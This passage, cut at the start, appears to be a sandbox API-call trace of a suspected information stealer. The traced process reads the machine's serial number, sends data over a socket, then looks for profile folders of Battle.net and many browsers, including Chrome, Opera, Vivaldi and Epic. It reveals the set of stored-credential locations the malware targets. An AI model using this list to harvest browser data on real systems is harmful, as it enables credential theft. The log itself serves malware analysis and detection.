(bstr="068VC346") returned 0x10 [0187.344] SysStringByteLen (bstr="068VC346") returned 0x10 [0187.344] IWbemClassObject:Get (in: This=0x7925a8, wszName="SerialNumber", lFlags=0, pVal=0x36f2b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x24f3110*=8, plFlavor=0x24f3114*=0 | out: pVal=0x36f2b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="068VC346", varVal2=0x0), pType=0x24f3110*=8, plFlavor=0x24f3114*=0) returned 0x0 [0187.344] SysStringByteLen (bstr="068VC346") returned 0x10 [0187.344] SysStringByteLen (bstr="068VC346") returned 0x10 [0187.348] CoGetContextToken (in: pToken=0x36f1d8 | out: pToken=0x36f1d8) returned 0x0 [0187.349] IUnknown:Release (This=0x70fab8) returned 0x1 [0187.349] IUnknown:Release (This=0x70fab8) returned 0x0 [0187.400] CoGetContextToken (in: pToken=0x36f1d8 | out: pToken=0x36f1d8) returned 0x0 [0187.400] IUnknown:Release (This=0x70f9f0) returned 0x1 [0187.400] IUnknown:Release (This=0x70f9f0) returned 0x0 [0187.549] CoCreateGuid (in: pguid=0x36ef8c | out: pguid=0x36ef8c*(Data1=0xdc17a3bf, Data2=0x7ead, Data3=0x4163, Data4=([0]=0x9b, [1]=0xe9, [2]=0x4e, [3]=0xbd, [4]=0xeb, [5]=0x7, [6]=0x6a, [7]=0x20))) returned 0x0 [0187.550] CoCreateGuid (in: pguid=0x36eed0 | out: pguid=0x36eed0*(Data1=0x4e7b355e, Data2=0x6847, Data3=0x4ffb, Data4=([0]=0xb3, [1]=0x57, [2]=0x78, [3]=0xff, [4]=0x5b, [5]=0xa8, [6]=0x98, [7]=0x9c))) returned 0x0 [0188.539] send (s=0x264, buf=0x25133ee*, len=719, flags=0) returned 719 [0188.540] recv (in: s=0x264, buf=0x241e714, len=8192, flags=0 | out: buf=0x241e714*) returned 125 [0189.335] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.336] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0189.454] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.504] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0189.506] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.558] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.558] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0189.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.559] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0189.559] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.562] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.562] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0189.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.562] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0189.563] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.565] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.565] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0189.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.566] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0189.566] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.568] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.568] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0189.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.568] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0189.569] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.571] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.572] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0189.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.572] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0189.572] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.575] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.575] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0189.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.575] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0189.576] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.578] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.578] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0189.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.579] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0189.580] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.582] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.582] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0189.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.583] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0189.583] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.585] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.585] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0189.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.586] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0189.586] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.588] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.588] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0189.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.589] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0189.589] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.591] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.591] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0189.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.592] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0189.592] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.594] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.594] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0189.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.595] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0189.595] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.597] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.598] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0189.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.598] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0189.598] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.600] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.600] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0189.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.600] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0189.601] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.603] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.603] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0189.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.603] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0189.604] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 [0189.606] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0189.606] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x36f0f4, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0189.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f18c) returned 1 [0189.671] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x36ec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0189.672] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x36ef3c | out: lpFindFileData=0x36ef3c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0189.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eefc) returned 1 